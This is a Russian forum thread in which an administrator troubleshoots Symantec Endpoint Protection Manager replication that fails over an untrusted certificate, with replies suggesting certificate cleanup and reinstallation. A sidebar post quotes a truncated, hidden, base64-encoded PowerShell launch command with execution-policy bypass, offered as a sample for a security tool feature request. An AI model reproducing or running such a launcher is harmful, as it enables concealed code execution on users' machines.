Перейти к содержанию
WhiteBear

SEP добавление партнера для репликации

Recommended Posts

WhiteBear

Обновлял SEP c версии 11.5 на 11.6 ( согласно документации удалил всех партнеров репликации (у меня в домене насколько сайтов). остановил службы, установил обновление ....)

Когда же начал восстанавливать партнеров по репликации нормально добавились все серверы , кроме одного

ругается на то. что невозможно проверить сертификат сайта партнера.

Если согласиться считать сертификат надежным, то все равно репликации не происходит.

При следующей проверке сертификат опять считается недействительным.

Что делать?

sep.jpg

post-7338-1297942326_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

совсем забыл, на проблемном сервере умирал жесткий диск ( судя по показаниям SMART и мы заменили его новым (старый диск склонировали на новый утилитой Seagate DiscWizard))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Олег Просветов

Добрый день,

Вы пробовали вручную запустить проверку сертификата? Это делается в разделе задачи (tasks) для сервера.

С уважением,

Олег

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

Да, конечно.

Говорит что не может проверить сертификат, спрашивает можно ли доверять. если отвечаешь утвердительно - говорит что довавил в списки доверенных и предлагает немедленно сделать репликацию.

Но репликация не проходит.

в итоге если еще раз проверить сертификат - все идет по новому кругу

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

Попытался пойти на крайние меры -удалил сайт, группу и список серверов управления.

деинсталлировал на проблемном сервере SEPM и клиента.

зачистил файловую систему и реестр\. даже удалил корневые сертификаты Symantec :)

Поставил SEPM заново. и теперь, при попытке добавить дополнительный сайт в домен - происходит облом на стадии синхронизации баз.

Все то же сообщение о сертификате которому нельзя доверять и сбой при синхронизации баз. :(

Есть какие нибудь мысли?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

сообщение о ошибке

111.jpg

post-7338-1299050803_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

поправка: обновлял не с 11_5, а с 11_6_мр1 на 11_6_мр2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shell
Говорит что не может проверить сертификат, спрашивает можно ли доверять. если отвечаешь утвердительно - говорит что довавил в списки доверенных и предлагает немедленно сделать репликацию.

Удалите из локального центра сертификации на новом ВСЕ сертификаты.

2е Интересно лично мне - а для какой цели несколько сайтов? Настолько разветвленная инфраструктура? Тогда почему встроенная БД?

Если в 1м сайте - добавьте без реплики, с собственной БД. А потом уже укажите в настройках что прореплицировать с корневого политики...

Что есть "проблемный сервер"? Тот с которым нельзя сейчас реплицироваться?

Все сервера ОДНОЙ версии?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear
Удалите из локального центра сертификации на новом ВСЕ сертификаты.

Боюсь показаться невежей, но как это сделать? через консоль sepm ?

2е Интересно лично мне - а для какой цели несколько сайтов? Настолько разветвленная инфраструктура? Тогда почему встроенная БД?

центральный офис + 8 удаленных филиалов (20-40 ПК, wan 1-2 мб\с) в каждом филиале 3-5 удаленных офисов(3-5 ПК, wan 0,2-0,5 мб\с)

соответственно на каждый филиал по сайту

Что есть "проблемный сервер"? Тот с которым нельзя сейчас реплицироваться?

да

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear

Все сервера ОДНОЙ версии?
да

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shell

Сертификаты удаляются через mmc консоль.

Вы добавляете домен\сайт с таким же именем? Если удалить на центральном сервере домен, сайт из реплик (из всех, если реплицируется с другими) или же попробовать добавить с другим именем?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
WhiteBear
Вы добавляете домен\сайт с таким же именем? Если удалить на центральном сервере домен, сайт из реплик (из всех, если реплицируется с другими) или же попробовать добавить с другим именем?

пробовал и то и другое (((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shell

Если только этот глючный ваш сервер не добавляется - переустанавливайте ОС.. Что тут еще скажешь.

Другие сервера, насколько я понимаю успешно добавляются?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×